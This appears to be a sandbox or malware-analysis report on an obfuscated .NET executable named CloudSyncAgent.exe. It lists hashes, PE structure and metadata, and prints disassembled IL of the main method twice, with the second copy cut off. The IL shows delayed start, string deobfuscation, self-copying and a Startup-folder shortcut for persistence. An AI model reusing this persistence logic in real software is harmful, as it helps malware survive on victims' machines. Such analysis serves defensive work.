Suspicious
Suspect

a3bf159d70832ad75b988d1b2bf70e40

PE Executable
|
MD5: a3bf159d70832ad75b988d1b2bf70e40
|
Size: 173.06 KB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
a3bf159d70832ad75b988d1b2bf70e40
Sha1
0629cf7dc116181616be420389b5003b28d9be95
Sha256
69472d2eadcabdbc1d9f998e51e9fdc231550a1c32549bbf800a790b73e5921c
Sha384
c7e0c7492fe3bdcaa23f7ab83c0b775d081a2f9fad05fa7f35080cac63d86bcdf29d9c32b0088b03236c275538c10148
Sha512
5d15a5ddffecfc5f506edb7de461dcf0294886a6214ccb52360e24efe949fc5f7d05d3f9c1c2ac0336abda23d722ab60930b2ea3453de921e99d2c80a402ba39
SSDeep
1536:Y4hF7wZUmxEOdhd0v3oQPu+9b5OGDmawHh6i+NOowNr4f5yEh:YumFTOv3pW+9b55DODrUyEh
TLSH
CA04A0CB2E9146B7D7ADFA7014B3737D872FAA3E2BC38E4EA48B2D45173254C8941191

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
a3bf159d70832ad75b988d1b2bf70e40
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
ID:0-preview.png
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Module Name

CloudSyncAgent.exe
Full Name

CloudSyncAgent.exe
EntryPoint

System.Void Stub.KX1iRc9Ra93h63s::GujZGYtDvXXR8i2()
Scope Name

CloudSyncAgent.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

CloudSyncAgent
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

342
Main Method

System.Void Stub.KX1iRc9Ra93h63s::GujZGYtDvXXR8i2()
Main IL Instruction Count

235
Main IL

ldsfld System.Int32 x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::E0G6TnDhUjbukaZ ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::7DwrJB4CRCJ9urz5RhxysDgAe6r5Z0LWDn1SgdcMYcc1u2EJY9fAdWLtJGYYfkS2L4ilQB7W call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::7DwrJB4CRCJ9urz5RhxysDgAe6r5Z0LWDn1SgdcMYcc1u2EJY9fAdWLtJGYYfkS2L4ilQB7W ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::1HC9605mGFoXrz0 call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::1HC9605mGFoXrz0 ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::1XIw73cNSracuCI call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::1XIw73cNSracuCI ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::46kEFLUWDeJPoAO call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::46kEFLUWDeJPoAO ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::cwRo12lXBvQetB8 call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::cwRo12lXBvQetB8 ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::jQ90zBs9O6tC7RT call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::jQ90zBs9O6tC7RT ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::IzAaUKYpdyBxVR1 call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::IzAaUKYpdyBxVR1 ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::JZ0VUnl26UHKJTd call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::JZ0VUnl26UHKJTd ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::5PhMIyG9GNJoQnA call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::5PhMIyG9GNJoQnA ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::dDldNK9NtELG4Ly call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::dDldNK9NtELG4Ly ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::N1TlvDXuvMdSAaV call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::N1TlvDXuvMdSAaV leave.s IL_0107: call System.Boolean Stub.R7sxNGmA76SXTpi::5TrNCo0LMBDZ5pZ() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0107: call System.Boolean Stub.R7sxNGmA76SXTpi::5TrNCo0LMBDZ5pZ() call System.Boolean Stub.R7sxNGmA76SXTpi::5TrNCo0LMBDZ5pZ() brtrue.s IL_0114: call System.Void Stub.KX1iRc9Ra93h63s::25IpaVLfq3hvcJG() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.KX1iRc9Ra93h63s::25IpaVLfq3hvcJG() ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::IzAaUKYpdyBxVR1 ldstr \ ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::JZ0VUnl26UHKJTd call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_4 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_015B: ldloc.0 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0172: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_5 ldloc.s V_5 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.R7sxNGmA76SXTpi::oN0OjCTUvUH9Nag call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_019D: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_019D: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::JZ0VUnl26UHKJTd call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_7 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_9 ldloc.s V_9 ldc.i4.0 <null> ldloc.s V_7 stelem.ref <null> ldloc.s V_9 stloc.s V_10 ldloc.s V_10 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_11 ldloc.s V_11 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_11 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_11 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0222: stloc.s V_12 ldloc.s V_10 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_7 stloc.s V_12 ldloc.s V_12 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_13 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_12 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_13 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_12 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_12 ldloc.s V_7 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.R7sxNGmA76SXTpi::mXX0Ur4GOlF96Xe leave.s IL_02A1: call System.Void Stub.R7sxNGmA76SXTpi::mQqX41ZUXm7TzbG() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_02A1: call System.Void Stub.R7sxNGmA76SXTpi::mQqX41ZUXm7TzbG() call System.Void Stub.R7sxNGmA76SXTpi::mQqX41ZUXm7TzbG() ldnull <null> ldftn System.Void Stub.KX1iRc9Ra93h63s::ytcDkeOEmWAioKJ() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() ldnull <null> ldftn System.Void Stub.KX1iRc9Ra93h63s::MySWt4NwFrp0WGo() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.DgKM7y3nhn0CPCj::AWFNIMvOgYysOD9() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_02E3: ldnull call System.Void Stub.ArxItj3SwQj3iS3::p50lhF8HVP2eHGC() ldnull <null> ldftn System.Void Stub.KX1iRc9Ra93h63s::D5p0cZO0V4KWPTR() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.KX1iRc9Ra93h63s::Uw1xHiYpRqdSjE4() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
Module Name

CloudSyncAgent.exe
Full Name

CloudSyncAgent.exe
EntryPoint

System.Void Stub.KX1iRc9Ra93h63s::GujZGYtDvXXR8i2()
Scope Name

CloudSyncAgent.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

CloudSyncAgent
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

342
Main Method

System.Void Stub.KX1iRc9Ra93h63s::GujZGYtDvXXR8i2()
Main IL Instruction Count

235
Main IL

ldsfld System.Int32 x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::E0G6TnDhUjbukaZ ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::7DwrJB4CRCJ9urz5RhxysDgAe6r5Z0LWDn1SgdcMYcc1u2EJY9fAdWLtJGYYfkS2L4ilQB7W call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::7DwrJB4CRCJ9urz5RhxysDgAe6r5Z0LWDn1SgdcMYcc1u2EJY9fAdWLtJGYYfkS2L4ilQB7W ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::1HC9605mGFoXrz0 call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::1HC9605mGFoXrz0 ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::1XIw73cNSracuCI call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::1XIw73cNSracuCI ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::46kEFLUWDeJPoAO call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::46kEFLUWDeJPoAO ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::cwRo12lXBvQetB8 call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::cwRo12lXBvQetB8 ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::jQ90zBs9O6tC7RT call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::jQ90zBs9O6tC7RT ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::IzAaUKYpdyBxVR1 call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::IzAaUKYpdyBxVR1 ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::JZ0VUnl26UHKJTd call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::JZ0VUnl26UHKJTd ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::5PhMIyG9GNJoQnA call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::5PhMIyG9GNJoQnA ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::dDldNK9NtELG4Ly call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::dDldNK9NtELG4Ly ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::N1TlvDXuvMdSAaV call System.Object Stub.aWUjsq2uqG4ty8d::GbY0Qdw4ARs8pRb(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::N1TlvDXuvMdSAaV leave.s IL_0107: call System.Boolean Stub.R7sxNGmA76SXTpi::5TrNCo0LMBDZ5pZ() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0107: call System.Boolean Stub.R7sxNGmA76SXTpi::5TrNCo0LMBDZ5pZ() call System.Boolean Stub.R7sxNGmA76SXTpi::5TrNCo0LMBDZ5pZ() brtrue.s IL_0114: call System.Void Stub.KX1iRc9Ra93h63s::25IpaVLfq3hvcJG() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.KX1iRc9Ra93h63s::25IpaVLfq3hvcJG() ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::IzAaUKYpdyBxVR1 ldstr \ ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::JZ0VUnl26UHKJTd call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_4 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_015B: ldloc.0 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0172: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_5 ldloc.s V_5 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.R7sxNGmA76SXTpi::oN0OjCTUvUH9Nag call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_019D: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_019D: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String x5V0aU8oPyiYfAqq2FdM94kEl80jaTMlhM7znbi3NIrmELwTLTOLhHKJJ7TI44aGPDFLt2ob::JZ0VUnl26UHKJTd call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_7 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_9 ldloc.s V_9 ldc.i4.0 <null> ldloc.s V_7 stelem.ref <null> ldloc.s V_9 stloc.s V_10 ldloc.s V_10 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_11 ldloc.s V_11 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_11 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_11 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0222: stloc.s V_12 ldloc.s V_10 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_7 stloc.s V_12 ldloc.s V_12 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_13 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_12 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_13 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_12 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_12 ldloc.s V_7 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.R7sxNGmA76SXTpi::mXX0Ur4GOlF96Xe leave.s IL_02A1: call System.Void Stub.R7sxNGmA76SXTpi::mQqX41ZUXm7TzbG() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_02A1: call System.Void Stub.R7sxNGmA76SXTpi::mQqX41ZUXm7TzbG() call System.Void Stub.R7sxNGmA76SXTpi::mQqX41ZUXm7TzbG() ldnull <null> ldftn System.Void Stub.KX1iRc9Ra93h63s::ytcDkeOEmWAioKJ() newobj System.Void 